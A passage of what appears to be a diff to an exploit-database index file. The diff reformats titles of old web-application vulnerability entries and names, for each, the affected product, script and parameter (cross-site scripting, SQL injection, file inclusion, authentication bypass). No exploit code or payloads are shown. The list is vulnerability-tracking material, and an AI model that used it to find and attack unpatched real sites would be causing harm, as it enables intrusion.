Scripting",2008-03-31,ZoRLu,php,webapps,0 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0 -31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 +31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery",2014-02-11,killall-9,hardware,webapps,80 31570,platforms/php/webapps/31570.txt,"WordPress Plugin Frontend Upload - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80 31571,platforms/php/webapps/31571.txt,"WordPress Plugin BuddyPress 1.9.1 - Privilege Escalation",2014-02-11,"Pietro Oliva",php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus - '/(rmdp) 1.5/1.7 Module for XOOPS search.php?key' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 @@ -32607,7 +32608,7 @@ id,file,description,date,author,platform,type,port 31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0 31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - 'admin.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 -31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php' lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 +31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - 'sess.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 - 'stats.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 - 'detail.php?lang' Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 @@ -32646,7 +32647,7 @@ id,file,description,date,author,platform,type,port 31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - '/browser/methodTable.php?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - '/browser/code.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - '/browser/details?class' Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 31658,platforms/php/webapps/31658.txt,"MyBoard 1.0.12 - 'rep.php' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 @@ -32655,13 +32656,13 @@ id,file,description,date,author,platform,type,port 31661,platforms/php/webapps/31661.txt,"EsContacts 1.0 - 'contacts.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31662,platforms/php/webapps/31662.txt,"EsContacts 1.0 - 'groupes.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31663,platforms/php/webapps/31663.txt,"EsContacts 1.0 - 'importer.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 -31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php' msg Parameter Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 +31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 - 'login.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 - 'search.php?msg' Cross-Site Scripting",2008-04-17,ZoRLu,php,webapps,0 31666,platforms/asp/webapps/31666.txt,"Cobalt 2.0 - 'adminler.asp' SQL Injection",2008-04-17,U238,asp,webapps,0 31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 - Multiple SQL Injections",2008-04-18,ZoRLu,php,webapps,0 31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 - 'wiki' Cross-Site Scripting",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 31670,platforms/php/webapps/31670.txt,"WordPress 2.3.3 - 'cat' Directory Traversal",2008-04-18,"Gerendi Sandor Attila",php,webapps,0 -31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - admin.php Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",php,webapps,0 +31671,platforms/php/webapps/31671.html,"TorrentFlux 2.3 - 'admin.php' Cross-Site Request Forgery (Add Admin)",2008-04-18,"Michael Brooks",php,webapps,0 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0 31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 @@ -32690,9 +32691,9 @@ id,file,description,date,author,platform,type,port 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps,0 31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,"Khashayar Fereidani",php,webapps,0 31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 - 'info.php?id' SQL Injection",2008-05-02,hadihadi,php,webapps,0 -31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php' year Parameter Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0 -31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 -31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 +31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php?year' Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0 +31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php?keyword' SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 +31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php?keyword' Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - '/PHP/prenom.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,ZoRLu,php,webapps,0 @@ -32702,7 +32703,7 @@ id,file,description,date,author,platform,type,port 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,php,webapps,80 -31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 +31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - 'owa_email_address' SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -32717,20 +32718,20 @@ id,file,description,date,author,platform,type,port 31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions",2008-05-07,Matrix86,php,webapps,0 31753,platforms/php/webapps/31753.txt,"Tux CMS 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-07,"Hadi Kiamarsi",php,webapps,0 -31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 +31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 Bu (WGate) - 'wgate.dll?~service' Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 -31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 -31772,platforms/php/webapps/31772.txt,"cPanel 11.x - scripts2/changeip user Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 -31773,platforms/php/webapps/31773.txt,"cPanel 11.x - scripts2/listaccts search Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 +31771,platforms/php/webapps/31771.txt,"cPanel 11.x - '/scripts2/knowlegebase?issue' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 +31772,platforms/php/webapps/31772.txt,"cPanel 11.x - '/scripts2/changeip?user' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 +31773,platforms/php/webapps/31773.txt,"cPanel 11.x - '/scripts2/listaccts?search' Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 31774,platforms/php/webapps/31774.txt,"BlogPHP 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-10,"David Sopas Ferreira",php,webapps,0 31775,platforms/php/webapps/31775.txt,"OtherLogic - 'vocourse.php' SQL Injection",2008-05-10,Breeeeh,php,webapps,0 31776,platforms/php/webapps/31776.txt,"WordPress Plugin WP Photo Album - 'photo' SQL Injection",2008-05-09,THE_MILLER,php,webapps,0 31777,platforms/php/webapps/31777.txt,"AJ Classifieds - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 -31778,platforms/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php' Gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 +31778,platforms/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php?Gallery' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31779,platforms/php/webapps/31779.txt,"PHPInstantGallery 2.0 - 'image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections",2008-05-12,SkyOut,php,webapps,0 @@ -32747,8 +32748,8 @@ id,file,description,date,author,platform,type,port 31798,platforms/php/webapps/31798.txt,"philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection",2008-05-14,U238,php,webapps,0 31799,platforms/php/webapps/31799.txt,"philboard 0.5 - 'W1L3D4_konuya_mesaj_yaz.asp' Multiple SQL Injections",2008-05-14,U238,php,webapps,0 31800,platforms/php/webapps/31800.pl,"SunShop Shopping Cart 3.5.1 - 'index.php' SQL Injection",2008-05-15,irvian,php,webapps,0 -31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - 'glossaire.php' id Parameter SQL Injection",2008-05-16,ZoRLu,php,webapps,0 -31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - 'glossaire.php' id Parameter Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 +31801,platforms/php/webapps/31801.txt,"ACGV News 0.9.1 - 'glossaire.php?id' SQL Injection",2008-05-16,ZoRLu,php,webapps,0 +31802,platforms/php/webapps/31802.txt,"ACGV News 0.9.1 - 'glossaire.php?id' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31803,platforms/php/webapps/31803.txt,"AN Guestbook 0.4 - 'send_email.php' Cross-Site Scripting",2008-05-16,ZoRLu,php,webapps,0 31804,platforms/php/webapps/31804.txt,"Digital Hive 2.0 - 'base_include.php' Local File Inclusion",2008-05-16,ZoRLu,php,webapps,0 31805,platforms/php/webapps/31805.txt,"PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection",2008-05-17,Lovebug,php,webapps,0 @@ -32787,7 +32788,7 @@ id,file,description,date,author,platform,type,port 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - 'HomepageTop.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - 'HomepageMain.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps,0 -31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - 'class/ApplyDB.php' Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - '/post3/view.asp?id' SQL Injection",2008-05-26,Unohope,asp,webapps,0 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' SQL Injection",2008-05-26,Unohope,asp,webapps,0 @@ -32820,7 +32821,7 @@ id,file,description,date,author,platform,type,port 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - 'annuaire.php?annuaire' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - '/admin/login.php Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - '/admin/login.php?Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - 'last_records.php?annuaire' Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - 'annuaire.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-11,"Sylvain THUAL",php,webapps,0 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 @@ -32848,7 +32849,7 @@ id,file,description,date,author,platform,type,port 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 -31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 +31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 @@ -32873,7 +32874,7 @@ id,file,description,date,author,platform,type,port 32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 32004,platforms/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 -32005,platforms/php/webapps/32005.txt,"FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +32005,platforms/php/webapps/32005.txt,"FaName 1.0 - 'page.php?name' Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 @@ -32881,7 +32882,7 @@ id,file,description,date,author,platform,type,port 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 -32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - 'admincp/faq.php Injection adminlog.php' Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 +32017,platforms/php/webapps/32017.html,"vBulletin 3.7.1 - 'admincp/faq.php?Injection adminlog.php' Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 32021,platforms/php/webapps/32021.txt,"Xomol CMS 1.2 - '/index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32022,platforms/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 @@ -32909,18 +32910,18 @@ id,file,description,date,author,platform,type,port 32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,php,webapps,0 32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",php,webapps,0 -32059,platforms/php/webapps/32059.txt,"Claroline 1.8.9 - announcements/announcements.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32060,platforms/php/webapps/32060.txt,"Claroline 1.8.9 - calendar/agenda.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32061,platforms/php/webapps/32061.txt,"Claroline 1.8.9 - course/index.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32062,platforms/php/webapps/32062.txt,"Claroline 1.8.9 - course_description/index.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32063,platforms/php/webapps/32063.txt,"Claroline 1.8.9 - document/document.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32064,platforms/php/webapps/32064.txt,"Claroline 1.8.9 - exercise/exercise.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32065,platforms/php/webapps/32065.txt,"Claroline 1.8.9 - group/group_space.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32059,platforms/php/webapps/32059.txt,"Claroline 1.8.9 - 'announcements/announcements.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32060,platforms/php/webapps/32060.txt,"Claroline 1.8.9 - 'calendar/agenda.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32061,platforms/php/webapps/32061.txt,"Claroline 1.8.9 - 'course/index.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32062,platforms/php/webapps/32062.txt,"Claroline 1.8.9 - 'course_description/index.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32063,platforms/php/webapps/32063.txt,"Claroline 1.8.9 - 'document/document.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32064,platforms/php/webapps/32064.txt,"Claroline 1.8.9 - 'exercise/exercise.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32065,platforms/php/webapps/32065.txt,"Claroline 1.8.9 - 'group/group_space.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32066,platforms/php/webapps/32066.txt,"Claroline 1.8.9 - '/phpBB/newtopic.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32067,platforms/php/webapps/32067.txt,"Claroline 1.8.9 - phpBB/reply.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32067,platforms/php/webapps/32067.txt,"Claroline 1.8.9 - 'phpBB/reply.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - 'phpBB/viewtopic.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - 'wiki/wiki.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - 'work/work.php' URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - '/claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 @@ -32944,10 +32945,10 @@ id,file,description,date,author,platform,type,port 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 -32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 -32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 -32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 -32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - user/user.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 +32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 +32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 +32107,platforms/php/webapps/32107.txt,"Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32108,platforms/php/webapps/32108.txt,"Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32109,platforms/php/webapps/32109.txt,"Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 @@ -33009,18 +33010,18 @@ id,file,description,date,author,platform,type,port 32199,platforms/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'seutubo.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32200,platforms/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php' uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32204,platforms/hardware/webapps/32204.txt,"ZYXEL 